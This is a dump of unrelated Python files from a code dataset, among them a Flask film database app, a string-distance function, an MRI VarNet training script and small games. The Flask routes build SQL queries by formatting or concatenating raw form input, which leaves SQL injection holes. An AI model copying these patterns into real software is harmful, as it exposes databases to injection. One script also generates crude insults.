= execute_query(db_connection, query2).fetchall()\n return render_template('genre.html', genres=result, films=film_results, genre_id=genre_selected, rows=result2)\n\n@webapp.route('/awards', methods=['POST','GET'])\ndef awards():\n db_connection = connect_to_database()\n award_selected = 1\n\n if request.method == 'POST' and request.form.get('composite_film_select') != None:\n film_selected = request.form.get('composite_film_select')\n award_selected = request.form.get('composite_award_select')\n composite_insert_query = 'INSERT INTO film_awards (award_id, film_id) VALUES (%s,%s)'\n data = (award_selected, film_selected)\n print(\"Executing query\")\n execute_query(db_connection, composite_insert_query, data)\n elif request.method == 'POST' and request.form.get('title') != None:\n # Add award to award table\n title = request.form['title']\n year_issued = request.form['year_issued']\n insert_query = 'INSERT INTO award (title, year_issued) VALUES (%s,%s)'\n data = (title, year_issued)\n execute_query(db_connection, insert_query, data)\n elif request.method == 'POST':\n # If this is not an INSERT, just show the films with selected award\n award_selected = request.form.get('award_select')\n\t\t\n # Award dropdown\n query = \"SELECT id, title FROM award;\"\n result = execute_query(db_connection, query).fetchall()\n print(result)\n\n # Film dropdown\n film_query = \"SELECT id, title FROM film;\"\n film_results = execute_query(db_connection, film_query).fetchall()\n\n # Show films with given award\n query2 = \"SELECT id, title, language, year, runtime FROM film f INNER JOIN film_awards a ON f.id = a.film_id AND a.award_id = %s\" % (award_selected)\n result2 = execute_query(db_connection, query2).fetchall();\n return render_template('awards.html', awards=result, films=film_results, award_id=award_selected, rows=result2);\n\n@webapp.route('/actors', methods=['POST','GET'])\ndef actors():\n actor_selected = 1 # Default selected actor unless otherwise specified\n db_connection = connect_to_database()\n\n if request.method == 'POST' and request.form.get('actor_select') != None:\n # Filter or update query\n actor_selected = request.form.get('actor_select')\n elif request.method == 'POST' and request.form.get('composite_film_select') != None:\n # Adding relationship to composite table film_direction\n film_selected = request.form.get('composite_film_select')\n actor_selected = request.form.get('composite_film_actor_select')\n composite_insert_query = 'INSERT INTO film_actors (actor_id, film_id) VALUES (%s,%s)'\n data = (actor_selected, film_selected)\n print(\"Executing query\")\n execute_query(db_connection, composite_insert_query, data)\n elif request.method == 'POST' and request.form.get('fname_insert') != None:\n # Adding new actor to actor table\n first_name = request.form['fname_insert']\n last_name = request.form['lname_insert']\n year_born = request.form['year_born_insert']\n year_died = request.form['year_died_insert']\n insert_query = 'INSERT INTO actor (first_name, last_name, year_born, year_died) VALUES (%s,%s,%s,%s)'\n data = (first_name, last_name, year_born, year_died)\n execute_query(db_connection, insert_query, data)\n\n # Populate Actor Dropdown\n query = \"SELECT id, last_name FROM actor;\"\n result = execute_query(db_connection, query).fetchall();\n print(result)\n\n # Populate Film Dropdown\n film_query = \"SELECT id, title FROM film;\"\n film_results = execute_query(db_connection, film_query).fetchall()\n\n # Populate Films with Selected Director Table\n query2 = \"SELECT id, title, language, year, runtime FROM film f INNER JOIN film_actors fa ON f.id = fa.film_id AND fa.actor_id = %s\" % (actor_selected)\n result2 = execute_query(db_connection, query2).fetchall();\n return render_template('actors.html', actors=result, actor_id=actor_selected, films=film_results, rows=result2);\n\n@webapp.route('/directors', methods=['POST','GET'])\ndef directors():\n valid_update_query = False\n director_selected = 1 # Default selected director unless otherwise specified\n db_connection = connect_to_database()\n \n if request.method == 'POST' and request.form.get('director_select') != None:\n # Filter or update query\n director_selected = request.form.get('director_select');\n first_name = request.form['fname']\n last_name = request.form['lname']\n year_born = request.form['year_born']\n year_died = request.form['year_died']\n valid_update_query = True\n elif request.method == 'POST' and request.form.get('composite_film_select') != None:\n # Adding relationship to composite table film_direction\n film_selected = request.form.get('composite_film_select')\n director_selected = request.form.get('composite_film_director_select')\n composite_insert_query = 'INSERT INTO film_direction (director_id, film_id) VALUES (%s,%s)'\n data = (director_selected, film_selected)\n print(\"Executing query\")\n execute_query(db_connection, composite_insert_query, data)\n elif request.method == 'POST' and request.form.get('fname_insert') != None:\n # Adding new director to director table\n first_name = request.form['fname_insert']\n last_name = request.form['lname_insert']\n year_born = request.form['year_born_insert']\n year_died = request.form['year_died_insert']\n insert_query = 'INSERT INTO director (first_name, last_name, year_born, year_died) VALUES (%s,%s,%s,%s)'\n data = (first_name, last_name, year_born, year_died)\n execute_query(db_connection, insert_query, data)\n else:\n valid_update_query = False\n\n # If the user has potentially entered UPDATE information, prepare the UPDATE query\n if valid_update_query:\n update_string = ''\n num_args = 0\n \n if first_name != '':\n update_string += \"first_name = \\'\" + first_name + '\\', '\n num_args += 1\n if last_name != '':\n update_string += \"last_name = \\'\" + last_name + '\\', '\n num_args += 1\n if year_born != '':\n update_string += \"year_born = \\'\" + year_born + '\\', '\n num_args += 1\n if year_died != '':\n update_string += \"year_died = \\'\" + year_died + '\\' '\n num_args += 1\n\n # If no arguments, this is not an UPDATE query\n if num_args == 0:\n valid_update_query = False\n elif num_args >= 1: # If one or more arguments, strip trailing comma\n update_string = update_string.rstrip(', ') + ' '\n \n # If this has proven to be a UPDATE query, perform it \n if valid_update_query:\n update_query = \"UPDATE director SET \" + update_string + \"WHERE id = %s\" % (director_selected) + \";\"\n webapp.logger.error(update_query)\n execute_query(db_connection, update_query);\n flash(\"Entry updated!\")\n\n # If the user has not entered a fname, lname, and year_born, this is an invalid query\n #if fname = '' || lname = '' || year_born = '':\n # valid_query = False\n\n # Populate Director Dropdown\n query = \"SELECT id, last_name FROM director;\"\n result = execute_query(db_connection, query).fetchall();\n print(result)\n\n # Populate Film Dropdown\n film_query = \"SELECT id, title FROM film;\"\n film_results = execute_query(db_connection, film_query).fetchall()\n \n # Populate Films with Selected Director Table\n query2 = \"SELECT id, title, language, year, runtime FROM film f INNER JOIN film_direction d ON f.id = d.film_id AND d.director_id = %s\" % (director_selected)\n result2 = execute_query(db_connection, query2).fetchall();\n return render_template('directors.html', directors=result, director_id=director_selected, films=film_results, rows=result2);\n","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":11188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"541001662","text":"def calculate(m, n):\n if len(m) == 0 or len(n) == 0:\n return max(len(n), len(m))\n if len(n) < len(m):\n m, n = n, m\n current_row = [i + 1 for i in range(len(m))]\n if m.find(n[0]) >= 0:\n for i in range(m.find(n[0]), len(m)):\n current_row[i] -= 1\n for i in range(1, len(n)):\n previous_row = current_row[:]\n for j in range(0, len(m)):\n add_to_m = add_to_mn = transposition = float(\"inf\")\n if j > 0:\n add_to_m = current_row[j - 1] + 1\n add_to_n = previous_row[j] + 1\n if m[j] == n[i] != n[i-1]:\n add_to_n -= 1\n if j > 0 and i > 0:\n if m[j] == n[i]:\n add_to_mn = previous_row[j - 1]\n else:\n add_to_mn = previous_row[j - 1] + 1\n if m[j] == n[i - 1] and m[j - 1] == n[i]:\n transposition = previous_row[j - 1]\n else:\n transposition = previous_row[j - 1] + 1\n current_row[j] = min(add_to_m, add_to_n, add_to_mn, transposition)\n return current_row[len(m) - 1]\n\n\nif __name__ == '__main__':\n m = input()\n n = input()\n print(calculate(m, n))","sub_path":"lab18/Evtushenko/damerau_levenshtien.py","file_name":"damerau_levenshtien.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"411640730","text":"import os, sys\r\nimport datasets.dataloader as dd\r\nfrom keras.optimizers import *\r\nfrom keras.callbacks import *\r\nfrom models.GAHs import GAHs_trans\r\n\r\nitokens, otokens = dd.MakeS2SDict('datasets/data/en2de.s2s.txt', dict_file='datasets/data/en2de_word.txt')\r\nXtrain, Ytrain = dd.MakeS2SData('datasets/data/en2de.s2s.txt', itokens, otokens, h5_file='datasets/data/en2de.h5')\r\nXvalid, Yvalid = dd.MakeS2SData('datasets/data/en2de.s2s.valid.txt', itokens, otokens, h5_file='datasets/data/en2de.valid.h5')\r\n\r\nprint('seq 1 words:', itokens.num())\r\nprint('seq 2 words:', otokens.num())\r\nprint('train shapes:', Xtrain.shape, Ytrain.shape)\r\nprint('valid shapes:', Xvalid.shape, Yvalid.shape)\r\n\r\n'''\r\nfrom rnn_s2s import RNNSeq2Seq\r\ns2s = RNNSeq2Seq(itokens,otokens, 256)\r\ns2s.compile('rmsprop')\r\ns2s.model.fit([Xtrain, Ytrain], None, batch_size=64, epochs=30, validation_data=([Xvalid, Yvalid], None))\r\n'''\r\n\r\nfrom models.Transformer import Transformer_trans, LRSchedulerPerStep\r\n\r\nd_model = 256\t# embedding is 256 ? but there is no embedding I guess??\r\ns2s = Transformer_trans(itokens, otokens, len_limit=70, d_model=d_model, d_inner_hid=512, \\\r\n\t\t\t\t n_head=8, layers=2, dropout=0.1)\r\n\r\n# s2s = GAHs_trans(itokens, otokens, len_limit=70, d_model=d_model, d_inner_hid=512, \\\r\n# \t\t\t\t n_head=8, layers=2, dropout=0.1)\r\n\r\nmfile = 'saved_model/en2de.'+s2s.__class__.__name__+'model.h5'\r\n\r\nlr_scheduler = LRSchedulerPerStep(d_model, 4000) \r\nmodel_saver = ModelCheckpoint(mfile, save_best_only=True, save_weights_only=True)\r\n\r\ns2s.compile(Adam(0.001, 0.9, 0.98, epsilon=1e-9))\r\ntry: s2s.model.load_weights(mfile)\r\nexcept: print('\\n\\nnew model')\r\n\r\nif 'eval' in sys.argv:\r\n\tfor x, y in s2s.beam_search('A black dog eats food .'.split(), delimiter=' '):\r\n\t\tprint(x, y)\r\n\tprint(s2s.decode_sequence_readout('A black dog eats food .'.split(), delimiter=' '))\r\n\tprint(s2s.decode_sequence_fast('A black dog eats food .'.split(), delimiter=' '))\r\n\twhile True:\r\n\t\tquest = input('> ')\r\n\t\tprint(s2s.decode_sequence_fast(quest.split(), delimiter=' '))\r\n\t\trets = s2s.beam_search(quest.split(), delimiter=' ')\r\n\t\tfor x, y in rets: print(x, y)\r\nelif 'test' in sys.argv:\r\n\timport datasets.ljqpy as ljqpy\r\n\tvalids = ljqpy.LoadCSV('datasets/data/en2de.s2s.valid.txt')\t# np.array([ [en_sent, de_sent] ]) \r\n\ten = [x[0].split() for x in valids[:100]]\t# np.array([ [token_list] ]), e.g. [['a', 'man', 'went']]\r\n\r\n\trets = s2s.decode_sequence_readout(en, delimiter=' ')\r\n\tfor i,x in enumerate(rets[:5]): \r\n\t\tprint(i,':',x)\r\n\r\n\trets = s2s.beam_search(en, delimiter=' ', verbose=1)\r\n\tfor i, x in enumerate(rets[:5]):\r\n\t\tprint('-'*20)\r\n\t\tprint(valids[i][1])\r\n\t\tfor y in x: print(y)\r\n\r\n\trets = s2s.decode_sequence_fast(en, delimiter=' ', verbose=1)\r\n\tfor i,x in enumerate(rets[:5]): \r\n\t\tprint(i,':',x)\r\n\r\nelse:\r\n\ts2s.model.summary()\r\n\ts2s.model.fit([Xtrain, Ytrain], None, batch_size=64, epochs=20, \\\r\n\t\t\t\tvalidation_data=([Xvalid, Yvalid], None), \\\r\n\t\t\t\tcallbacks=[lr_scheduler, model_saver])\r\n\t# val_accu @ 30 epoch: 0.7045","sub_path":"en2de_main.py","file_name":"en2de_main.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"560391887","text":"class UndirectedGraphNode:\n def __init__(self, x):\n self.label = x\n self.neighbors = []\n\n\nclass Solution:\n \"\"\"\n @param: node: A undirected graph node\n @return: A undirected graph node\n \"\"\"\n def cloneGraph(self, node):\n if node is None:\n return None\n\n nodes = self.get_nodes(node)\n\n mapper = {}\n\n for original_node in nodes:\n mapper[original_node] = UndirectedGraphNode(original_node.label)\n\n for original_node in nodes:\n for original_neighbor in original_node.neighbors:\n mapper[original_node].neighbors.append(mapper[original_neighbor])\n\n return mapper[node]\n \n def get_nodes(self, node):\n queue = collections.deque([node])\n nodes = set([node])\n\n while queue:\n current_node = queue.popleft()\n\n for neighbor in current_node.neighbors:\n if neighbor not in nodes:\n nodes.add(neighbor)\n queue.append(neighbor)\n\n return nodes","sub_path":"US Giants/Search & Recursion/137. Clone Graph.py","file_name":"137. Clone Graph.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"503874326","text":"from webscrap import wlog\r\nfrom webscrap import wscrap\r\n\r\nwlog.set_custom_log_info('html/error.log')\r\n\r\nnews_scrap = wscrap.NewsScraper(wscrap.url_aj, wlog)\r\nnews_scrap.retrive_webpage()\r\nnews_scrap.write_webpage_as_html()\r\n\r\nnews_scrap.read_webpage_from_html()\r\nnews_scrap.convert_data_to_bs4()\r\nnews_scrap.print_data()\r\nnews_scrap.parse_soup_to_simple_html()\r\n\r\n\r\n# try:\r\n# raise Exception\r\n# except Exception as e:\r\n# Wlog.report(e)","sub_path":"scraping/chapter4.py","file_name":"chapter4.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"154601432","text":"from django.conf.urls import url\nfrom my_blog import views\nfrom django.contrib.auth.decorators import permission_required\n\n\nurlpatterns = [\n url(r'^page/(?P\\d+)/$', views.ArticlesMain.as_view(), name='articles_main'),\n url(r'^$', views.ArticlesMain.as_view(), name='articles_main'),\n url(r'^article/(?P\\d+)/$', views.ArticleFully.as_view(), name='article_fully'),\n url(r'^articles_archive/$', views.ArticlesArchive.as_view(), name='articles_archive'),\n url(r'^category/(?P\\d+)/$', views.ArticlesCategory.as_view(), name='category_articles'),\n url(r'^create_art/$',\n permission_required('my_blog.add_article')(views.CreateArticle.as_view()), name='article_create'),\n url(r'^update_art/(?P\\d+)/$',\n permission_required('my_blog.change_article')(views.UpdateArticle.as_view()), name='article_update'),\n url(r'^delete_art/(?P\\d+)/$',\n permission_required('my_blog.delete_article')(views.DeleteArticle.as_view()), name='article_delete'),\n]\n","sub_path":"my_blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"105003138","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 24 11:40:58 2019\n\n@author: awesome_k\n\"\"\"\n\nimport random\nimport time\n\nmyScore = 0\ncompScore = 0\ndraw = 0\n\nrps = ['r', 's', 'p']\n\nplayAgain = 'y'\n\nwhile playAgain == 'y':\n myChoice = input('Make a move! r/s/p')\n compChoice = random.choice(rps)\n\n if myChoice[0].lower() == compChoice:\n print('Draw!')\n time.sleep(2)\n draw = draw + 1\n elif myChoice[0].lower() == 'r' and compChoice == 's':\n print('You chose rock and the computer chose scissors. You win!')\n time.sleep(2)\n myScore = myScore + 1\n elif myChoice[0].lower() == 'r' and compChoice == 'p':\n print('You chose rock and the computer chose paper. You lose!')\n time.sleep(2)\n compScore = compScore + 1\n elif myChoice[0].lower() == 'p' and compChoice == 'r':\n print('You chose paper and the computer chose rock. You win!')\n time.sleep(2)\n myScore = myScore + 1\n elif myChoice[0].lower() == 'p' and compChoice == 's':\n print('You chose paper and the computer chose scissors. You lose!')\n time.sleep(2)\n compScore = compScore + 1\n elif myChoice[0].lower() == 's' and compChoice == 'r':\n print('You chose scissors and the computer chose rock. You lose!')\n time.sleep(2)\n compScore = compScore + 1\n elif myChoice[0].lower() == 's' and compChoice == 'p':\n print('You chose scissors and the computer chose paper. You win!')\n time.sleep(2)\n myScore = myScore + 1\n else:\n print('Invalid entry.')\n time.sleep(2)\n\n playAgain = input('Do you want to play again? (y/n)')\n if playAgain == 'n':\n print('Thanks bye!')\n if playAgain == 'sc':\n print('Human ' + str(myScore), 'Computer ' + str(compScore), 'Draw ' + str(draw))","sub_path":"rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"188958123","text":"# Load base config file\nfrom dxConfig import dxConfig;\n# Add CrashInfo group if it doesn't exist.\ndxCrashInfoConfig = dxConfig.get(\"CrashInfo\", {});\n# Add default values where no values have been supplied:\nfor (sName, xValue) in {\n \"bOutputIO\": False, # Output cdb i/o while debugging application\n \"uMaxAddressOffset\": 0xFFF, # How far from an address can a pointer be offset and still be considered to point to it?\n \"uMaxFunctionOffset\": 0xFFF, # How far from a function symbol can a pointer be offset and still be cosidered to point to it?\n \"uMaxStackFramesCount\": 20, # How many stack frames are retreived for analysis?\n \"uStackHashFramesCount\": 3, # How many stack frames are hashed for the crash id?\n \"asSymbolCachePaths\": [], # Where are symbols cached?\n \"bOutputFirstChanceExceptions\": False, # Are first chance exceptions detected and output?\n \"bOutputCommandLine\": False, # Is the cbd.exe command line printed before execution?\n \"bDebugSymbolLoading\": False, # Enable noizy symbol loading in cdb.\n}.items():\n if sName not in dxCrashInfoConfig:\n dxCrashInfoConfig[sName] = xValue;\n","sub_path":"cCrashInfo/dxCrashInfoConfig.py","file_name":"dxCrashInfoConfig.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"318420444","text":"import random, typing\r\nimport Lists, RecentGen\r\n\r\ndef respond(message: typing.AnyStr, gen_type: int=1) -> str:\r\n if gen_type == 1:\r\n return msg_response(message)\r\n elif gen_type == 2:\r\n return Lists.errorMsgGen(1)\r\n\r\n\r\ndef msg_response(message: typing.AnyStr) -> str:\r\n question_type = classify(message)\r\n if question_type == \"why\":\r\n msg = Lists.introGen(3, 1)+Lists.nounGen(1)+\" \"+Lists.verbGen(1)+\" \"+Lists.nounGen(1)\r\n elif question_type == 'how':\r\n msg = \"With \"+Lists.nounGen(1)\r\n elif question_type == 'who' or question_type == 'what':\r\n msg = Lists.nounGen(1)\r\n elif question_type == 'when':\r\n msg = Lists.timeGen()\r\n else:\r\n msg = retaliate()\r\n \r\n return msg\r\n\r\n\r\ndef classify(message: typing.AnyStr) -> str:\r\n if \"why\" in message: return \"why\"\r\n elif \"how\" in message: return \"how\"\r\n elif \"who\" in message: return \"who\"\r\n elif \"what\" in message or \"which\" in message: return \"what\"\r\n elif \"when\" in message: return \"when\"\r\n \r\n return None\r\n\r\n\r\ndef shitpost(): # Uses returned intros, verbs, and nouns to create a coherent shitpost\r\n a = random.randint(0,10)\r\n if a < 5:\r\n intro = Lists.introGen(1, None)\r\n end = \".\"\r\n else:\r\n intro = Lists.introGen(2, None)\r\n end = \"?\"\r\n b = random.randint(0,100)\r\n if b < 50:\r\n verb = Lists.verbGen(1)+\" \"\r\n noun = Lists.nounGen(1)\r\n elif 68 > b > 50:\r\n verb = Lists.verbGen(2)+\" \"\r\n noun = Lists.nounGen(2)\r\n elif 90 > b > 68:\r\n shit = Lists.phraseGen(1)\r\n return(shit) \r\n else:\r\n verb = Lists.verbGen(3) # ends without noun\r\n noun = \"\"\r\n shit = intro+verb+noun+end\r\n return(shit)\r\n\r\n\r\ndef retaliate():\r\n chance = random.randint(0,100)\r\n if chance <= 40:\r\n chance = random.randint(0,100)\r\n if chance <= 25:\r\n retaliation = \"You are \"+Lists.adjectiveGen(1)+\"and \"+Lists.adjectiveGen(1)\r\n elif 25 < chance <= 50:\r\n retaliation = \"You are \"+Lists.adjectiveGen(1)\r\n elif 50 < chance <= 75:\r\n retaliation = \"You are \"+Lists.adverbGen()+Lists.adjectiveGen(1)\r\n else:\r\n retaliation = \"Your \"+Lists.nounGen(3)+\" are \"+Lists.adjectiveGen(1) \r\n elif 41 < chance <= 90:\r\n chance = random.randint(0,100)\r\n if chance <= 33:\r\n retaliation = Lists.introGen(4, None)+Lists.verbGen(1)+\" your \"+Lists.adjectiveGen(1)+\"fucking \"+Lists.nounGen(3)\r\n elif 33 < chance <= 66:\r\n retaliation = Lists.introGen(4, None)+Lists.verbGen(1)+\" your \"+Lists.adjectiveGen(1)+Lists.nounGen(3)\r\n else:\r\n retaliation = Lists.introGen(4, None)+Lists.verbGen(1)+\" your \"+Lists.nounGen(3)\r\n elif chance > 85:\r\n retaliation = Lists.phraseGen(2)\r\n return retaliation","sub_path":"Writer.py","file_name":"Writer.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"120972325","text":"from machine import SPI,ADC\nfrom FlagArcade import *\nimport LCD\n\n# 螢幕初始設定\nspi = SPI(1, baudrate=40000000, polarity=0, phase=0)\nscreen = LCD.LCD(spi, 15, 5, 0)\nscreen.init()\nscreen.clearLCD()\n\n# 設定按鈕感測腳位\nadc = ADC(0)\n\nwhile True:\n val=adc.read()\n key=getKey(val)\n screen.text(10,10,\"val : \"+str(val)+\" \")\n screen.text(10,30,\"key : \"+key+\" \")","sub_path":"labs/lab07_keyDetect.py","file_name":"lab07_keyDetect.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"352068898","text":"\"\"\"\nTrain a VarNet model on the fastMRI dataset with MRAugment data augmentation. \n\nThe steps to add MRAugment to any training code is simple:\n 1) Initialize a DataAugmentor with desired augmentation parameters and probabilities\n 2) Pass augmentor to DataTransform that is applied to the training data\n 3) You are all set!\n \nSupports \n - scanner model based filtering of training and validation data\n - single-coil data with a simplified VarNet model\n\nCode based on https://github.com/facebookresearch/fastMRI/fastmri_examples/varnet/train_varnet_demo.py\n\"\"\"\n\nimport os, sys\nimport pathlib\nfrom argparse import ArgumentParser\n\nsys.path.insert(0, os.path.dirname(pathlib.Path(__file__).parent.absolute()) )\n\nimport pytorch_lightning as pl\nfrom fastmri.data.mri_data import fetch_dir\nfrom fastmri.data.subsample import create_mask_for_mask_type\nfrom fastmri.pl_modules import VarNetModule\n\n# MRAugment-specific imports\nfrom mraugment.data_augment import DataAugmentor\nfrom mraugment.data_transforms import VarNetDataTransform\nfrom pl_modules.fastmri_data_module import FastMriDataModule\n\n# Imports for logging and other utility\nfrom pytorch_lightning.plugins import DDPPlugin\nimport yaml\nfrom utils import load_args_from_config\nimport torch.distributed\nfrom pl_modules.singlecoil_varnet_module import SinglecoilVarNetModule\n\n\ndef cli_main(args):\n if args.verbose:\n print(args.__dict__)\n \n pl.seed_everything(args.seed)\n # ------------\n # model\n # ------------\n if args.challenge == 'multicoil':\n model = VarNetModule(\n num_cascades=args.num_cascades,\n pools=args.pools,\n chans=args.chans,\n sens_pools=args.sens_pools,\n sens_chans=args.sens_chans,\n lr=args.lr,\n lr_step_size=args.lr_step_size,\n lr_gamma=args.lr_gamma,\n weight_decay=args.weight_decay,\n )\n else:\n assert args.challenge == 'singlecoil'\n model = SinglecoilVarNetModule(\n num_cascades=args.num_cascades,\n pools=args.pools,\n chans=args.chans,\n lr=args.lr,\n lr_step_size=args.lr_step_size,\n lr_gamma=args.lr_gamma,\n weight_decay=args.weight_decay,\n )\n\n # -----------------\n # data augmentation\n # -----------------\n # pass an external function to DataAugmentor that \n # returns the current epoch for p scheduling\n current_epoch_fn = lambda: model.current_epoch\n \n # initialize data augmentation pipeline\n augmentor = DataAugmentor(args, current_epoch_fn)\n \n # ------------\n # data\n # ------------\n # this creates a k-space mask for transforming input data\n mask = create_mask_for_mask_type(\n args.mask_type, args.center_fractions, args.accelerations\n )\n \n # use random masks for train transform, fixed masks for val transform\n # pass data augmentor to train transform only\n train_transform = VarNetDataTransform(augmentor=augmentor, mask_func=mask, use_seed=False)\n val_transform = VarNetDataTransform(mask_func=mask)\n test_transform = VarNetDataTransform()\n \n # ptl data module - this handles data loaders\n data_module = FastMriDataModule(\n data_path=args.data_path,\n challenge=args.challenge,\n train_transform=train_transform,\n val_transform=val_transform,\n test_transform=test_transform,\n test_split=args.test_split,\n test_path=args.test_path,\n sample_rate=args.sample_rate,\n volume_sample_rate=args.volume_sample_rate,\n use_dataset_cache_file=args.use_dataset_cache_file,\n batch_size=args.batch_size,\n num_workers=args.num_workers,\n distributed_sampler=(args.accelerator in (\"ddp\", \"ddp_cpu\")),\n combine_train_val=args.combine_train_val,\n train_scanners=args.train_scanners,\n val_scanners=args.val_scanners,\n combined_scanner_val=args.combined_scanner_val,\n )\n\n # ------------\n # trainer\n # ------------\n trainer = pl.Trainer.from_argparse_args(args, \n plugins=DDPPlugin(find_unused_parameters=False),\n checkpoint_callback=True,\n callbacks=args.checkpoint_callback)\n \n # Save all hyperparameters to .yaml file in the current log dir\n if torch.distributed.is_available():\n if torch.distributed.is_initialized():\n if torch.distributed.get_rank() == 0:\n save_all_hparams(trainer, args)\n else: \n save_all_hparams(trainer, args)\n \n # ------------\n # run\n # ------------\n trainer.fit(model, datamodule=data_module)\n\ndef save_all_hparams(trainer, args):\n if not os.path.exists(trainer.logger.log_dir):\n os.makedirs(trainer.logger.log_dir)\n save_dict = args.__dict__\n save_dict.pop('checkpoint_callback')\n with open(trainer.logger.log_dir + '/hparams.yaml', 'w') as f:\n yaml.dump(save_dict, f)\n \ndef build_args():\n parser = ArgumentParser()\n\n # basic args\n backend = \"ddp\"\n num_gpus = 2 if backend == \"ddp\" else 1\n batch_size = 1\n\n # client arguments\n parser.add_argument(\n '--config_file', \n default=None, \n type=pathlib.Path, \n help='If given, experiment configuration will be loaded from this yaml file.',\n )\n parser.add_argument(\n '--verbose', \n default=False, \n action='store_true', \n help='If set, print all command line arguments at startup.',\n )\n\n # data transform params\n parser.add_argument(\n \"--mask_type\",\n choices=(\"random\", \"equispaced\"),\n default=\"equispaced\",\n type=str,\n help=\"Type of k-space mask\",\n )\n parser.add_argument(\n \"--center_fractions\",\n nargs=\"+\",\n default=[0.04],\n type=float,\n help=\"Number of center lines to use in mask\",\n )\n parser.add_argument(\n \"--accelerations\",\n nargs=\"+\",\n default=[8],\n type=int,\n help=\"Acceleration rates to use for masks\",\n )\n\n # data config\n parser = FastMriDataModule.add_data_specific_args(parser)\n parser.set_defaults(\n mask_type=\"random\", # random masks for knee data\n batch_size=batch_size, # number of samples per batch\n test_path=None, # path for test split, overwrites data_path\n )\n \n # data augmentation config\n parser = DataAugmentor.add_augmentation_specific_args(parser)\n\n # module config\n parser = VarNetModule.add_model_specific_args(parser)\n parser.set_defaults(\n num_cascades=12, # number of unrolled iterations\n pools=4, # number of pooling layers for U-Net\n chans=18, # number of top-level channels for U-Net\n sens_pools=4, # number of pooling layers for sense est. U-Net\n sens_chans=8, # number of top-level channels for sense est. U-Net\n lr=0.0003, # Adam learning rate\n lr_step_size=40, # epoch at which to decrease learning rate\n lr_gamma=0.1, # extent to which to decrease learning rate\n weight_decay=0.0, # weight regularization strength\n )\n\n # trainer config\n parser = pl.Trainer.add_argparse_args(parser)\n parser.set_defaults(\n gpus=num_gpus, # number of gpus to use\n replace_sampler_ddp=False, # this is necessary for volume dispatch during val\n accelerator=backend, # what distributed version to use\n seed=42, # random seed\n deterministic=True, # makes things slower, but deterministic\n )\n\n args = parser.parse_args()\n \n # Load args if config file is given\n if args.config_file is not None:\n args = load_args_from_config(args)\n \n\n args.checkpoint_callback = pl.callbacks.ModelCheckpoint(\n save_top_k=1,\n verbose=True,\n monitor=\"val_metrics/ssim\",\n mode=\"max\",\n filename='epoch{epoch}-ssim{val_metrics/ssim:.4f}',\n auto_insert_metric_name=False,\n save_last=True\n )\n\n return args\n\n\ndef run_cli():\n args = build_args()\n\n # ---------------------\n # RUN TRAINING\n # ---------------------\n cli_main(args)\n\n\nif __name__ == \"__main__\":\n run_cli()","sub_path":"mraugment_examples/train_varnet_fastmri.py","file_name":"train_varnet_fastmri.py","file_ext":"py","file_size_in_byte":8313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"532202849","text":"n = int(input('Digite um numero de termos que quer ver: '))\r\ns1 = 0\r\ns2 = 1\r\ncont = 2\r\nif n == 1:\r\n print('0')\r\nelif n == 2:\r\n print('0 - 1')\r\nelse:\r\n while cont < n:\r\n s3 = s1+s2\r\n s1 = s2\r\n s2 = s3\r\n cont += 1\r\n print('0 - 1 - {} - '.format(s3), end='')\r\n\r\n\r\n","sub_path":"063-fibonacci.py","file_name":"063-fibonacci.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"457866872","text":"import util\nimport pandas as pd\n\ndef test_location_tier():\n assert util.get_location_tier('kothanur') == 'tier1'\n assert util.get_location_tier('Lingadheeranahalli') == 'tier2'\n\ndef test_home_prediction():\n model = util.get_saved_model()\n\n location = 'Electronic City Phase II'\n tier = util.get_location_tier(location)\n\n X = [\n [\n 1056,\n 2, # bath\n 2, # bhk\n 1 if tier == 'tier1' else 0,\n 1 if tier == 'tier2' else 0,\n 1 if tier == 'tier3' else 0,\n 1 if tier == 'tier4' else 0,\n 1 if tier == 'tier5' else 0\n ]\n ]\n\n y_truth = 39.07\n\n result = model.predict(X)\n\n # 20% above and below truth value is assumed to be okay prediction\n assert result[0] <= y_truth*(1+0.2) and result[0]>=y_truth*(1-0.2)\n","sub_path":"DataScience/BangloreHomePrices/server/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"211764563","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.3 (3230)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/cary/__main__.py\n# Compiled at: 2015-08-06 11:53:39\n# Size of source mod 2**32: 1595 bytes\nimport sys, logging\nfrom importlib.machinery import SourceFileLoader\nimport argparse\nfrom cary.caryapp import CaryApp\n\ndef configure_cary(app, config):\n app.allowed_addresses = 